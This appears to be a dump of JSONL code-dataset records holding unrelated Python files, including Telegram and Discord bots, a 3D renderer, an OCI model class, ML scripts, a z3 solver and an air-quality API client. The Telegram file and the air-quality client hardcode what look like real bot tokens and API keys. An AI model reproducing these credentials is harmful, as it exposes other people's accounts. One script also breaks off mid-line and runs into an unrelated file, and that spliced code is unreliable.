declarative_base, sessionmaker\n\n# Ваш токен телеграм-бота\nTOKEN = \"6597488638:AAGViKDlZ7a2XeoMCHHUuL3kjbhsubrM8Jk\"\n\n# Настройка журнала (логирование)\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n# Глобальные переменные\nCITIES = [\"Москва\", \"Берлин\", \"Лондон\", \"Нью-Йорк\", \"Токио\"]\nWEATHER_CACHE = {}\nDATABASE_URL = \"sqlite:///weather_log.db\"\n\n# Создание базы данных\nBase = declarative_base()\n\n\nclass WeatherLog(Base):\n __tablename__ = 'weather_log'\n id = Column(Integer, primary_key=True, autoincrement=True)\n city = Column(String(50), nullable=False)\n temperature = Column(Float, nullable=False)\n wind_speed = Column(Float, nullable=False)\n wind_direction = Column(String(10), nullable=False)\n precipitation = Column(String(20), nullable=False)\n timestamp = Column(Integer, nullable=False)\n\n\nasync def get_weather_data(city: str):\n if city in WEATHER_CACHE and (WEATHER_CACHE[city][\"timestamp\"] + 600) > time.time():\n return WEATHER_CACHE[city][\"data\"]\n\n base_url = f\"http://127.0.0.1:8000/weather/?city={city}\"\n async with aiohttp.ClientSession() as session:\n async with session.get(base_url) as response:\n if response.status == 200:\n data = await response.json()\n # Кеширование данных о погоде\n WEATHER_CACHE[city] = {\"data\": data, \"timestamp\": time.time()}\n return data\n else:\n return None\n\n return None\n\n\nasync def on_start_command(message: types.Message):\n await message.reply(\"Введите ваш город:\")\n\n\nasync def on_help_command(message: types.Message):\n await message.reply(\"Доступные команды:\\n\"\n \"/help - Вывести список команд\\n\"\n \"/cities - Вывести список доступных городов\\n\"\n \"/start - Начать работу и получить погоду в выбранном городе\")\n\n\nasync def on_cities_command(message: types.Message):\n await message.reply(\"Доступные города:\\n\" + \"\\n\".join(CITIES))\n\n\nasync def on_text_message(message: types.Message):\n user_input = message.text.strip().lower()\n\n if user_input in (city.lower() for city in CITIES):\n city = next(city for city in CITIES if city.lower() == user_input)\n\n # Вызов функции get_weather_data для получения данных о погоде с сервера Django\n weather_data = await get_weather_data(city)\n\n if weather_data:\n # Обработка данных о погоде и отправка ответа пользователю\n temperature = weather_data.get(\"temperature\")\n wind_speed = weather_data.get(\"wind_speed\")\n precipitation = weather_data.get(\"precipitation\")\n\n if temperature is not None and wind_speed is not None and precipitation is not None:\n await message.reply(f\"Вы выбрали город: {city}. Погода в этом городе:\\n\"\n f\"Температура: {temperature}°C\\n\"\n f\"Скорость ветра: {wind_speed} м/с\\n\"\n f\"Осадки: {precipitation}\")\n else:\n await message.reply(\"Извините, данные о погоде для этого города недоступны.\")\n else:\n await message.reply(\"Извините, не удалось получить погодные данные для этого города.\")\n else:\n await message.reply(\"Город не найден. Введите другой город.\")\n\n\nasync def on_unknown_command(message: types.Message):\n await message.reply(\"Неизвестная команда. 
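# A stripped-down sketch of the timestamp cache get_weather_data above
# implements with WEATHER_CACHE: each entry stores the payload plus its
# fetch time and is reused only while younger than the TTL. fetch is a
# stand-in for the real HTTP call.
import time

CACHE = {}
TTL = 600  # seconds, the same freshness window the bot uses

def cached(key, fetch):
    entry = CACHE.get(key)
    if entry is not None and entry["timestamp"] + TTL > time.time():
        return entry["data"]                 # still fresh: skip the network
    data = fetch(key)                        # missing or stale: refetch
    CACHE[key] = {"data": data, "timestamp": time.time()}
    return data

print(cached("Москва", lambda city: {"temperature": -5.0}))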
Введите /help для получения списка команд.\")\n\n\nasync def save_weather_to_database(city: str, weather_data: dict):\n try:\n engine = create_engine(DATABASE_URL)\n Base.metadata.create_all(engine)\n\n Session = sessionmaker(bind=engine)\n session = Session()\n\n weather_log = WeatherLog(city=city,\n temperature=weather_data[\"temperature\"],\n wind_speed=weather_data[\"wind_speed\"],\n wind_direction=weather_data[\"wind_direction\"],\n precipitation=weather_data[\"precipitation\"],\n timestamp=int(time.time()))\n session.add(weather_log)\n session.commit()\n\n except Exception as e:\n logger.error(\"Ошибка сохранения данных о погоде в базу данных: %s\", e)\n session.rollback()\n\n finally:\n session.close()\n\n\nasync def main():\n bot = Bot(token=TOKEN)\n dp = Dispatcher(bot)\n\n dp.register_message_handler(on_start_command, commands=\"start\")\n dp.register_message_handler(on_help_command, commands=\"help\")\n dp.register_message_handler(on_cities_command, commands=\"cities\")\n dp.register_message_handler(on_text_message, content_types=types.ContentType.TEXT)\n dp.register_message_handler(on_unknown_command)\n\n # Запуск бота\n await dp.start_polling()\n\n\nif __name__ == '__main__':\n asyncio.run(main())\n","repo_name":"Kapitan21oo/tz_bot_aiogram","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70599239205","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 31 16:55:09 2021\n\nneed to get colors and shadows working\nfix holes in surfaces\n\n@author: teddyrosenbaum\n\"\"\"\nimport numpy as np\nimport py3dMath as mp\nimport matplotlib.pyplot as plt\n\ndef test():\n \"\"\"\n Description\n --------\n Makes and displays a 3d cube \n \n Input\n ----\n None\n \n Output\n ----\n None\n \n \"\"\"\n w = workSpace()\n w.cameras.append(camera(30,30,100,100,-3,-3,2,-15,45))\n w.lights.append(light(10,-3,-3,2))\n w.addCube(0,0,0,1)\n w.renderCamera(0)\n\ndef makeColor(brightness,color):\n \"\"\"\n Description\n --------\n Makes a shade of a color given a brightness value and a color\n \n Input\n ----\n Double brightness\n Double[] color with RGB color values\n \n Output\n ----\n Double[] with RGB color values\n \n \"\"\"\n maxBrightness = 10\n c = []\n if(brightness >= maxBrightness):\n return [1,1,1]\n for i in color:\n c.append((1/(maxBrightness-brightness) * i) / (1/(maxBrightness-brightness) + 1/(brightness))) #weighted mean with color and black\n return c\n\n \ndef brightness(surface,lights,camera,x,y,z):\n \"\"\"\n Description\n --------\n Returns the brightness value based no relitive angle and distance from all the lights\n \n Input\n ----\n Surface surface \n Light[] lights\n Camera camera\n Doubles x, y, z \n \n Output\n ----\n Double \n \n \"\"\"\n brightness = 1\n v1 = surface.plane.o\n v2 = mp.vector(camera.x - x, camera.y - y, camera.z - z)\n if v1.angle(v2) > 90:\n v1.x = -v1.x\n v1.y = -v1.y\n v1.z = -v1.z\n for i in lights:\n v3 = mp.vector(i.x - x, i.y - y, i.z - z)\n d = mp.pointPointDistance(mp.point(i.x,i.y,i.z),mp.point(x,y,z))\n brightness = brightness + (np.sin(np.pi / 180 * v1.angle(v3)) * i.brightness /(4 * np.pi * d * d))\n return brightness\n\n \nclass workSpace:\n def __init__(self):\n self.cameras = []\n self.lights = []\n self.surfaces = []\n \n def clearSurfaces(self):\n \"\"\"\n Description\n --------\n Removes any surfaces from workSpace\n \n Input\n ----\n None\n \n Output\n ----\n 
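# A compact, runnable sketch of the try/commit, except/rollback,
# finally/close discipline that save_weather_to_database above applies,
# shown against an in-memory SQLite engine. Importing declarative_base from
# sqlalchemy.orm, as the bot does, assumes SQLAlchemy 1.4+.
from sqlalchemy import create_engine, Column, Integer, String
from sqlalchemy.orm import declarative_base, sessionmaker

Base = declarative_base()

class Log(Base):
    __tablename__ = 'log'
    id = Column(Integer, primary_key=True)
    city = Column(String(50))

engine = create_engine('sqlite://')
Base.metadata.create_all(engine)
session = sessionmaker(bind=engine)()
try:
    session.add(Log(city='Москва'))
    session.commit()      # persist the row
except Exception:
    session.rollback()    # undo the failed transaction
finally:
    session.close()       # always release the connection

print(sessionmaker(bind=engine)().query(Log).count())  # 1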
None\n \n \"\"\"\n self.surfaces = []\n \n def renderCamera(self,camIndex):\n \"\"\"\n Description\n --------\n Creates a 3d image from perspective of camera at index camIndex\n \n Input\n ----\n Int camIndex\n \n Output\n ----\n None\n \n \"\"\"\n camera = self.cameras[camIndex]\n ax = plt.gca()\n c = mp.point(camera.x,camera.y,camera.z)\n \n for i in range(camera.pixX):\n for j in range(camera.pixY):\n yaw = ((camera.yaw-camera.angleX/2) + ((camera.angleX * (camera.pixX - i))/camera.pixX)) * np.pi / 180\n pitch = ((camera.pitch-camera.angleY/2) + ((camera.angleY * (j)/camera.pixY))) * np.pi / 180\n l = mp.line(c.x, c.y, c.z, np.cos(yaw), np.sin(yaw), np.tan(pitch)) \n point = []\n index = []\n for k in range(len(self.surfaces)):\n surface = self.surfaces[k]\n p = mp.planeLineIntersect(l,surface.plane)\n if(p != False):\n if(surface.inSurface(p)):\n point.append(p)\n index.append(k)\n '''old could reduce computational demand\n if(mp.pointLineDistance(l,surface.center) <= surface.radius):\n p = mp.planeLineIntersect(l,self.surface.plane)\n if(self.surfaces[k].inSurface(p)):\n point.append(p)\n index.append(i)\n '''\n \n if(len(point) == 0):\n ax.add_patch(plt.Rectangle([i,j], 1, 1, color = [1,1,1]))\n \n else:\n \n minVal = mp.pointPointDistance(c,point[0])\n minValIndex = 0\n for k in range(len(point)):\n distance = mp.pointPointDistance(c,point[k])\n if(minVal >= distance):\n minVal = distance\n minValIndex = k\n #need to add lines to light to add shadows\n surface = self.surfaces[index[minValIndex]]\n #b = brightness(surface,self.lights,camera,point[minValIndex].x,point[minValIndex].y,point[minValIndex].z)\n #ax.add_patch(makePixel(i,j,b,self.surfaces[minValIndex].color))\n ax.add_patch(plt.Rectangle([i,j], 1, 1, color = [0,0,0]))\n plt.axis('scaled')\n plt.axis('off')\n plt.show()\n \n \n \n def addCube(self,x,y,z,size):\n \"\"\"\n Description\n --------\n Adds a cube at location x, y, z with a size of size\n \n Input\n ----\n Doubles x, y, z\n Double size\n \n Output\n ----\n None\n \n \"\"\"\n p1 = mp.point(x,y,z)\n p2 = mp.point(x+size,y,z)\n p3 = mp.point(x,y+size,z)\n p4 = mp.point(x,y,z+size)\n p5 = mp.point(x+size,y+size,z)\n p6 = mp.point(x+size,y,z+size)\n p7 = mp.point(x,y+size,z+size)\n p8 = mp.point(x+size,y+size,z+size)\n self.surfaces.append(surface([0,0,0],[p1,p2,p5,p3])) #z constant\n self.surfaces.append(surface([0,0,0],[p4,p6,p8,p7])) #z constant\n self.surfaces.append(surface([0,0,0],[p1,p2,p6,p4])) #y constant\n self.surfaces.append(surface([0,0,0],[p3,p5,p8,p7])) #y constant\n self.surfaces.append(surface([0,0,0],[p1,p3,p7,p4])) #x constant\n self.surfaces.append(surface([0,0,0],[p2,p5,p8,p6])) #x constant\n \n\nclass light:\n def __init__(self,brightness,x,y,z):\n self.brightness = brightness\n self.x = x\n self.y = y\n self.z = z\n \n\nclass camera:\n def __init__(self,angleX,angleY,pixX,pixY,x,y,z,pitch,yaw):\n self.angleX = angleX\n self.angleY = angleY\n self.pixX = pixX\n self.pixY = pixY\n self.x = x\n self.y = y\n self.z = z\n self.pitch = pitch\n self.yaw = yaw\n \n\nclass surface:\n #all points must be in same plane\n def __init__(self,color,points):\n self.color = color\n self.points = points\n v1 = mp.vector(self.points[1].x - self.points[0].x, self.points[1].y - self.points[0].y, self.points[1].z - self.points[0].z)\n v2 = mp.vector(self.points[1].x - self.points[2].x, self.points[1].y - self.points[2].y, self.points[1].z - self.points[2].z)\n v3 = v1.cross(v2) \n self.plane = 
mp.plane(v3.x*self.points[0].x+v3.y*self.points[0].y+v3.z*self.points[0].z,v3.x,v3.y,v3.z)\n self.radius = 0 \n self.c = self.center()\n for p in self.points:\n d = mp.pointPointDistance(p,self.c)\n if d > self.radius:\n self.radius = d\n \n \n '''\n def add(self,x,y,z):\n self.x.append(x)\n self.y.append(y)\n self.z.append(z)\n '''\n \n def center(self):\n \"\"\"\n Description\n --------\n Finds the center of surface \n \n Input\n ----\n None\n \n Output\n ----\n Point\n \n \"\"\" \n xtot = 0\n ytot = 0\n ztot = 0\n for i in self.points:\n xtot = xtot + i.x\n ytot = ytot + i.y\n ztot = ztot + i.z\n return mp.point(xtot/len(self.points),ytot/len(self.points),ztot/len(self.points))\n \n def inSurface(self,p):\n \"\"\"\n Description\n --------\n Determines if point p is in surface\n Returns True if it is otherwise returns False\n \n Input\n ----\n Point p\n \n Output\n ----\n Boolean \n \n \"\"\" \n tot = 0\n \n sx = self.points[0].x-self.points[1].x\n sy = self.points[0].y-self.points[1].y\n sz = self.points[0].z-self.points[1].z\n k = (100 * mp.vector(sx,sy,sz).mag())\n p1 = mp.point(p.x+(sx*k*self.radius),p.y+(sy*k*self.radius),p.z+(sz*k*self.radius))\n for i in range(len(self.points)-2):\n if mp.segmentIntersects(p,p1,self.points[i],self.points[i+1]):\n tot = tot + 1\n if mp.segmentIntersects(p,p1,self.points[0],self.points[-1]):\n tot = tot + 1\n '''\n for i in range(len(self.points)-1):\n p1 = self.points[i]\n p2 = self.points[i+1]\n intersect = mp.segmentIntersects(p,self.c,p1,p2)\n if intersect:\n tot = tot + 1\n\n p1 = self.points[0]\n p2 = self.points[-1]\n intersect = mp.segmentIntersects(p,self.c,p1,p2)\n if intersect:\n tot = tot + 1\n\n '''\n \n if tot%2 == 1:\n return True\n return False\n\n","repo_name":"trbaum/3dGameOfLife","sub_path":"py3d.py","file_name":"py3d.py","file_ext":"py","file_size_in_byte":9358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"31583509089","text":"from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass Operation(object):\n \"\"\"\n The operation object.\n \"\"\"\n\n #: A constant which can be used with the model_type property of a Operation.\n #: This constant has a value of \"PROCEDURE\"\n MODEL_TYPE_PROCEDURE = \"PROCEDURE\"\n\n #: A constant which can be used with the model_type property of a Operation.\n #: This constant has a value of \"API\"\n MODEL_TYPE_API = \"API\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new Operation object with values from keyword arguments. 
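# The surface constructor above derives its plane from three of the points:
# two edge vectors, their cross product as the normal (a, b, c), and
# d = n . p0, giving the plane a*x + b*y + c*z = d. A dependency-free sketch
# of that step (illustration only, plain tuples instead of py3dMath):
def plane_from_points(p0, p1, p2):
    v1 = tuple(q - p for p, q in zip(p0, p1))  # p1 - p0
    v2 = tuple(q - p for p, q in zip(p2, p1))  # p1 - p2
    n = (v1[1] * v2[2] - v1[2] * v2[1],
         v1[2] * v2[0] - v1[0] * v2[2],
         v1[0] * v2[1] - v1[1] * v2[0])        # cross product -> normal
    d = sum(a * b for a, b in zip(n, p0))
    return n, d

print(plane_from_points((0, 0, 0), (1, 0, 0), (0, 1, 0)))  # ((0, 0, -1), 0)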
This class has the following subclasses and if you are using this class as input\n to a service operations then you should favor using a subclass over the base class:\n\n * :class:`~oci.data_integration.models.OperationFromProcedure`\n * :class:`~oci.data_integration.models.OperationFromApi`\n\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param model_type:\n The value to assign to the model_type property of this Operation.\n Allowed values for this property are: \"PROCEDURE\", \"API\"\n :type model_type: str\n\n :param metadata:\n The value to assign to the metadata property of this Operation.\n :type metadata: oci.data_integration.models.ObjectMetadata\n\n \"\"\"\n self.swagger_types = {\n 'model_type': 'str',\n 'metadata': 'ObjectMetadata'\n }\n\n self.attribute_map = {\n 'model_type': 'modelType',\n 'metadata': 'metadata'\n }\n\n self._model_type = None\n self._metadata = None\n\n @staticmethod\n def get_subtype(object_dictionary):\n \"\"\"\n Given the hash representation of a subtype of this class,\n use the info in the hash to return the class of the subtype.\n \"\"\"\n type = object_dictionary['modelType']\n\n if type == 'PROCEDURE':\n return 'OperationFromProcedure'\n\n if type == 'API':\n return 'OperationFromApi'\n else:\n return 'Operation'\n\n @property\n def model_type(self):\n \"\"\"\n **[Required]** Gets the model_type of this Operation.\n The operation type.\n\n Allowed values for this property are: \"PROCEDURE\", \"API\"\n\n\n :return: The model_type of this Operation.\n :rtype: str\n \"\"\"\n return self._model_type\n\n @model_type.setter\n def model_type(self, model_type):\n \"\"\"\n Sets the model_type of this Operation.\n The operation type.\n\n\n :param model_type: The model_type of this Operation.\n :type: str\n \"\"\"\n allowed_values = [\"PROCEDURE\", \"API\"]\n if not value_allowed_none_or_none_sentinel(model_type, allowed_values):\n raise ValueError(\n f\"Invalid value for `model_type`, must be None or one of {allowed_values}\"\n )\n self._model_type = model_type\n\n @property\n def metadata(self):\n \"\"\"\n Gets the metadata of this Operation.\n\n :return: The metadata of this Operation.\n :rtype: oci.data_integration.models.ObjectMetadata\n \"\"\"\n return self._metadata\n\n @metadata.setter\n def metadata(self, metadata):\n \"\"\"\n Sets the metadata of this Operation.\n\n :param metadata: The metadata of this Operation.\n :type: oci.data_integration.models.ObjectMetadata\n \"\"\"\n self._metadata = metadata\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n","repo_name":"oracle/oci-python-sdk","sub_path":"src/oci/data_integration/models/operation.py","file_name":"operation.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"52"} +{"seq_id":"30920214268","text":"#!/usr/bin/env python3\nimport sys\nimport requests\nimport json\nfrom math import sqrt\n\nlat1 = float(sys.argv[1])\nlon1 = float(sys.argv[2])\nd = float(sys.argv[3])\nurl = 'http://20.185.44.219:5000'\n# accident_map = []\ni=0\nfor data in sys.stdin:\n obj = json.loads(data)\n lat2 = float(obj['Start_Lat'])\n lon2 = float(obj['Start_Lng'])\n dist = sqrt((lat2-lat1)**2 + (lon2-lon1)**2)\n if dist None:\n X = sorted(list(DATA_ROOT.glob(\"**/*.npz\")))\n if self.use_data_augmentation:\n 
transform = get_diffusion_transform()\n else:\n transform = None\n\n print(f\"validation image path: {X[-3:]}\")\n\n self.train_dataset = DiffusionDataset(\n path=X[:-3] * self.times, transform=transform, type=self.type\n )\n self.val_dataset = DiffusionDataset(\n path=X[-3:] * 4, type=self.type\n ) # *4 in order to allocate on 4 GPUs\n\n def prepare_data(self, *args, **kwargs):\n # set deterministic training for reproducibility\n random_state = random.randint(0, 100)\n set_determinism(seed=random_state)\n return super().prepare_data(*args, **kwargs)\n\n def train_dataloader(self):\n print(f\"get {len(self.train_dataset)} training 3D image!\")\n return DataLoader(\n self.train_dataset, batch_size=self.batch_size, num_workers=0, shuffle=True\n )\n\n def val_dataloader(self):\n print(f\"get {len(self.val_dataset)} validation 3D image!\")\n return DataLoader(self.val_dataset, batch_size=self.batch_size, num_workers=0)\n\n def test_dataloader(self):\n print(f\"get {len(self.val_dataset)} validation 3D image!\")\n return DataLoader(self.val_dataset, batch_size=1, num_workers=0)\n","repo_name":"stfxecutables/Multichannel-input-pixelwise-regression-u-nets","sub_path":"project/lig_module/data_model_dti.py","file_name":"data_model_dti.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"36548668137","text":"from tensorflow.keras.models import load_model\nimport numpy as np\nimport cv2 as cv\nmodel1=load_model('model.h5')\ncap=cv.VideoCapture(\"lane_vgt.mp4\")\nwhile True:\n ret, frame = cap.read()\n if not ret:\n break\n frame = cv.resize(frame, (192,192))\n frame = frame / 255\n frame = cv.resize(frame,(192,192))\n frame = np.array(frame)\n frame = frame[None, :, :, :]\n mask = model1.predict(frame)\n rem = np.resize(mask, (192, 192, 1))\n rem = rem.astype('float64')\n rem = rem * 255\n rem=np.where(rem>3,255,rem)\n cv.imshow('frame', rem)\n if cv.waitKey(1) == ord('q'):\n break\ncap.release()\ncv.destroyAllWindows()\n","repo_name":"Piyush-M01/MachineLearning","sub_path":"lane/Practise.py","file_name":"Practise.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26621451786","text":"from sklearn.datasets import load_boston\nboston = load_boston()\n\nfrom sklearn.cross_validation import train_test_split\nimport numpy as np\nX = boston.data\ny = boston.target\nX_train,X_test,y_train,y_test = train_test_split(X,y,test_size=.25,random_state=33)\n\n#由于数据目标房价之间差异较大,因此需要标准化处理\n# print(np.max(boston.target))\n# print(np.min(boston.target))\n# print(np.mean(boston.target))\n\nfrom sklearn.preprocessing import StandardScaler\nss_X = StandardScaler()\nss_y = StandardScaler()\nX_train = ss_X.fit_transform(X_train)\nX_test = ss_X.transform(X_test)\ny_train = ss_y.fit_transform(y_train)\ny_test = ss_y.transform(y_test)\n\n#使用线性回归模型LinearRegression和SGDRegressor分别对波士顿房价进行预测\nfrom sklearn.linear_model import LinearRegression,SGDRegressor\nlr = LinearRegression()\nlr.fit(X_train,y_train)\nlr_y_pred = lr.predict(X_test)\n\nsgdr = SGDRegressor()\nsgdr.fit(X_train,y_train)\nsgdr_y_pred = sgdr.predict(X_test)\n\n#使用三种回归评价机制以及两种调用R-squared评价模块的方法,对本节模型的回归性能作出评价\n\nprint(\"The value of default measurement of LinearRegression is: \",lr.score(X_test,y_test))\n\nfrom sklearn.metrics import r2_score,mean_squared_error,median_absolute_error\n\n#使用r2_score模块输出评价结果\nprint(\"The value of R-squared of LinearRegression is: 
\",r2_score(y_test,lr_y_pred))\n\n#使用mean_squared_error模块输出评价结果\n\nprint(\"The mean aquared error of LinearRegression is:\",mean_squared_error(ss_y.inverse_transform(y_test),ss_y.inverse_transform(lr_y_pred)))\n\n#使用median_absolute_error模块输出评价结果\nprint(\"The mean absolute error of LinearRegression is:\",median_absolute_error(ss_y.inverse_transform(y_test),ss_y.inverse_transform(lr_y_pred)))\n\n\n\nprint(\"The value of default measurement of SGDRegressor is: \",sgdr.score(X_test,y_test))\n\n\n#使用r2_score模块输出评价结果\nprint(\"The value of R-squared of SGDRegressor is: \",r2_score(y_test,sgdr_y_pred))\n\n#使用mean_squared_error模块输出评价结果\n\nprint(\"The mean aquared error of SGDRegressor is:\",mean_squared_error(ss_y.inverse_transform(y_test),ss_y.inverse_transform(sgdr_y_pred)))\n\n#使用median_absolute_error模块输出评价结果\nprint(\"The mean absolute error of SGDRegressor is:\",median_absolute_error(ss_y.inverse_transform(y_test),ss_y.inverse_transform(sgdr_y_pred)))\n\n\n","repo_name":"aqc112420/meachine-learning","sub_path":"Machine-learning/ML2Kaggle/Linear-regression.py","file_name":"Linear-regression.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"39096765170","text":"import discord\nfrom discord.ext import commands\nimport json\nimport os\nfrom discord_slash import SlashCommand\n\n\ndef getPrefix(client, message):\n with open('prefix.json','r') as f:\n prefixes = json.load(f)\n try:\n return prefixes[str(message.guild.id)]\n except:\n return '-'\n\nclient = commands.Bot(command_prefix=getPrefix,intents=discord.Intents().all(),help_command=None, case_insensitive=True)\nslash = SlashCommand(client, sync_commands=True)\n\nfor filename in os.listdir('./cogs'):\n if filename.endswith('.py'):\n client.load_extension(f'cogs.{filename[:-3]}')\n print(\"Loaded\", filename)\n\n\n# @client.command()\n# async def load(ctx, extension):\n# client.load_extension(f'cogs.{extension}')\n\n# @client.command()\n# async def unload(ctx, extension):\n# client.unload_extension(f'cogs.{extension}')\n\n\n@client.event\nasync def on_ready():\n await client.change_presence(activity=discord.Activity(type=discord.ActivityType.watching,name=\"For -help\"))\n print('-' * 20)\n print(client.user.name, \"is online\")\n print(\"ID:\", client.user.id)\n print('-' * 20)\n\n\nclient.run(os.getenv(\"TOKEN\"))","repo_name":"DannyFS/Dannys-Discord-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17543169761","text":"#! 
-*- encoding=utf-8 -*-\n# How functions work in Python\nimport inspect\nframe = None\ndef foo():\n    bar()\ndef bar():\n    global frame\n    frame = inspect.currentframe()\n\n'''\npython.exe is the C-language interpreter. It executes the foo function with a C function called PyEval_EvalFrameEx. When that function runs a Python function, it first creates a stack frame.\nThe stack frame is really an execution context, and it is itself an object (in Python everything is an object): the function is compiled into a bytecode object,\nand the function's bytecode runs inside the context of the frame object; the function's bytecode is globally unique.\nWhen foo calls the sub-function bar, another stack frame is created.\nAll stack frames are allocated on heap memory, not on stack memory, and heap memory has the property that\nit stays in memory for as long as it is not released.\nThat property lets a stack frame exist independently of its caller.\nWhether or not we are calling the function, the frame is still there; as long as we hold a reference to its frame we can control it, which means our control over functions can be very precise\n\n'''\n# We can use dis to inspect what the bytecode looks like\nimport dis\nprint(dis.dis(foo))\nfoo()\n# the function has finished running\nprint(frame.f_code.co_name) # the stack frame of the function itself\ncaller_frame = frame.f_back # the stack frame of the calling function\nprint(caller_frame.f_code.co_name)\nprint('*' * 80)\n'''\nThe steps above show that even though foo has finished running, we can still get hold of its stack frame.\nThis is unlike static languages, where a function call works as a stack and\nthe whole stack is destroyed once the call completes.\nThe whole call sequence resembles a recursive operation:\ncalling foo creates one stack frame, and calling bar creates another\nFrame object:\nf_back -> the stack frame object of this function's caller\nf_code -> this function's bytecode object, a PyCodeObject\n'''\ndef gen_func():\n    yield 1\n    name = \"fzk\"\n    age = 27\n    yield 44\n    birthday = \"19920825\"\n    return \"yuner\"\n'''\nWhen Python compiles a function's bytecode and sees the yield keyword, it knows this is not an ordinary function\nbut a generator function, and it marks the function with a flag. When we call the function,\nit returns a generator object, which wraps the PyFrameObject stack frame.\nThe generator object looks like this:\n[Heap memory]\nPyGenObject:\ngi_frame\ngi_code\n\ngi_frame -> PyFrameObject (slightly different from the one above): f_lasti (points at the position of the most recently executed bytecode) and f_locals (a dict of all assignments made before the last yield)\ngi_code -> PyCodeObject: gen_fn's bytecode\n'''\ngen = gen_func()\nprint(dis.dis(gen))\nprint('*'* 80)\nprint(gen.gi_frame.f_lasti)\nprint(gen.gi_frame.f_locals)\nnext(gen)\nprint(gen.gi_frame.f_lasti)\nprint(gen.gi_frame.f_locals)\nnext(gen)\nprint(gen.gi_frame.f_lasti)\nprint(gen.gi_frame.f_locals)\n# next(gen)\n# print(gen.gi_frame.f_lasti)\n# print(gen.gi_frame.f_locals)\n\n# list is implemented in C, so we cannot see its source; it is heavily optimized and many of its methods cannot be overridden\n# UserList is worth studying: when writing your own list you can inherit from UserList and customize it\nfrom collections import UserList\n'''\nUserList inherits from MutableSequence,\nMutableSequence inherits from Sequence.\nThe source of the __iter__ method inside Sequence reads as follows:\ndef __iter__(self):\n    i = 0\n    try:\n        while True:\n            v = self[i]\n            yield v\n            i += 1\n    except IndexError:\n        return\n\ni records the position in the array;\nself[i] in turn calls the sequence's __getitem__ method\n'''","repo_name":"wnz27/Coding-Daily","sub_path":"content/Python_Generate/迭代器和生成器/how_gen_work.py","file_name":"how_gen_work.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3945287185","text":"#!/usr/bin/env python3\n\nimport re\nfrom z3 import *\n\npoints = set()\nradii = {}\nwith open(\"input.txt\") as f:\n    for line in f:\n        x, y, z, r = map(int, re.findall(\"-?[0-9]+\", line))\n        point = (x, y, z)\n        points.add(point)\n        radii[point] = r\n\n\ndef zabs(x):\n    return If(x >= 0, x, -x)\n\n\ndef zdist(a, b):\n    \"a, b :: (x, y, z)\"\n    return zabs(a[0] - b[0]) + zabs(a[1] - b[1]) + zabs(a[2] - b[2])\n\n\ndef dist(a, b):\n    \"a, b :: (x, y, z)\"\n    return abs(a[0] - b[0]) + abs(a[1] - b[1]) + abs(a[2] - b[2])\n\n\nx, y, z = Ints(\"x y z\") # variable coord\npt = (x, y, z)\n\no = Optimize()\nin_range = Int(\"in_range\")\nin_range = x * 0\nfor point in points:\n    in_range += If(zdist(pt, point) <= radii[point], 1, 0)\n\nnum_in_range = Int(\"num_in_range\")\no.add(num_in_range == in_range)\no.maximize(num_in_range)\no.check()\n\nmodel = o.model()\nbest = model[x].as_long(), model[y].as_long(), model[z].as_long()\nprint(dist((0, 0, 0), 
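# A small companion experiment for the frame notes above: a generator's
# frame lives on the heap inside the generator object, so f_lasti and
# f_locals can be inspected between next() calls, independently of any
# caller's stack. Exact f_lasti values vary across CPython versions.
def pausable():
    a = 1
    yield a
    b = 2
    yield b

g = pausable()
print(g.gi_frame.f_lasti, g.gi_frame.f_locals)  # nothing executed yet
next(g)
print(g.gi_frame.f_lasti, g.gi_frame.f_locals)  # paused at 1st yield: {'a': 1}
next(g)
print(g.gi_frame.f_lasti, g.gi_frame.f_locals)  # paused at 2nd yield: a and b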
best))\n","repo_name":"mtn/advent18","sub_path":"day23/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"32946868521","text":"import sys\nimport requests\nfrom random import randint\nfrom utils.net import create_net, net_by_quantity\nfrom shapely import geometry\nimport geopandas as gpd\nimport json\n\nGEOM_COLUMN = 'geometry'\n\n\nclass AirConditionGetter:\n \"\"\"\n For more info about API go here:\n https://breezometer.com/air-quality-api/\n \"\"\"\n\n API_PATH = \"https://api.breezometer.com/baqi/\"\n\n API_KEYS = [\n \"44454c79cdcb4a409f0f852f76b22c54\",\n \"194734dfed444b2b97e397498e434a85\",\n \"441aacba5c4f4c2385b74483bd59a8ec\",\n \"60babde2ae614606bb60623843867136\",\n \"186a594cfae44136b7ce52bddac4b4a7\"\n ]\n\n NET_STEP = 0.01\n MAX_QTY = 36\n\n def get_df(self, lng1, lat1, lng2, lat2):\n net = create_net(lng1, lat1, lng2, lat2, self.NET_STEP)\n if len(net) > self.MAX_QTY:\n net = net_by_quantity(lng1, lat1, lng2, lat2, self.MAX_QTY)\n data = []\n for coordinates in net:\n 